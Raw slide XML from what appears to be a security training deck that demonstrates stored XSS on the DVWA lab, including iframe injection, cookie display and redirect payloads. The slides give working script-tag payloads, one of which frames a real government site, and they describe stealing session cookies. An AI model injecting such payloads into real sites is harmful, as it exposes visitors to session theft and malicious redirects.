            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Name : any name
Message : &lt;script&gt;alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>alienware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>’)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="798"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8237160" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Name was appeared while the message was not</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="801" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="5281200" cy="3276360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="802" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284640" y="3048120"/>
            <a:ext cx="5409720" cy="3314520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1866960" y="3466800"/>
            <a:ext cx="990360" cy="2133360"/>
          </a:xfrm>
          <a:prstGeom prst="leftUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 17215"/>
              <a:gd name="adj3" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="5A5A5A"/>
            </a:solidFill>
            <a:roun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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="7619760" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Passive information gathering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Passive Information Gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>This type of profiling is technically difficult to perform as we are never sending any traffic to the target organization neither from one of our hosts or “anonymous” hosts or services across the Internet. This means we can only use and gather archived or stored information. As such this information can be out of date or incorrect as we are limited to results gathered from a third party</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302"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03"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04"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B793C283-2ADC-4D07-9735-2FDD54A86A5B}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Every time we access this page, the javascript will run thus produced the pop-up</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="806" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5092200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="807" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895480" y="3124080"/>
            <a:ext cx="3447720" cy="1209240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="9143640" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>The javascript code was stored in ‘guest’ database</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="809" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2076480"/>
            <a:ext cx="9143640" cy="2704680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="1219320"/>
            <a:ext cx="304560" cy="2590560"/>
          </a:xfrm>
          <a:prstGeom prst="down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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>By default, the comment box in the XSS stored GUI will only allow for 50 characters.  So we are going to change the character limit to 250 characters to demonstrate the following attacks.
1. Open the index.php file at C:\xampp\htdocs\DVWA\vulnerabilities\xss_s
2. Edit the message text area maxlength from 50 into 250 and save the file.
3. Restart apache server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="7772040" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Fix Stored Cross Site Scripting (XSS) Comment Box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813"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814"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3D0235D9-888F-4BA2-8722-C110C4798768}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>142</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815"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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>iFrame Injection using XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Using IFrame tag, we can injects the malware contain website(links) using Cross Site Scripting in popular websites.  So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website.  Malware  will be loaded to your computer, now you are infected.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;Iframe&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>tag stands for Inline Frame.  It is used to insert contents from another website or server.  That can be useful for building online applications.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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Injecting &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>&gt; at “Message” box</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>="http://www.mampu.gov.my" width=700 height=300&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="820" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181480" y="3352680"/>
            <a:ext cx="304560" cy="1752120"/>
          </a:xfrm>
          <a:prstGeom prst="down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457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Cookie-hijack using XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The attacker can compromise the session token by using malicious code or programs running at the client-side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example uses an XSS attack to show the cookie value of the current session; using the same technique it's possible to create a specific JavaScript code that will send the cookie to the attacker.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>[Reference : OWASP]</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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8762760" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Inject using script below </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
Input : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="826" name="Picture 3"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8686440" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Inject using script below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
Input : &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>='http://www.google.com.my';&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="828" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
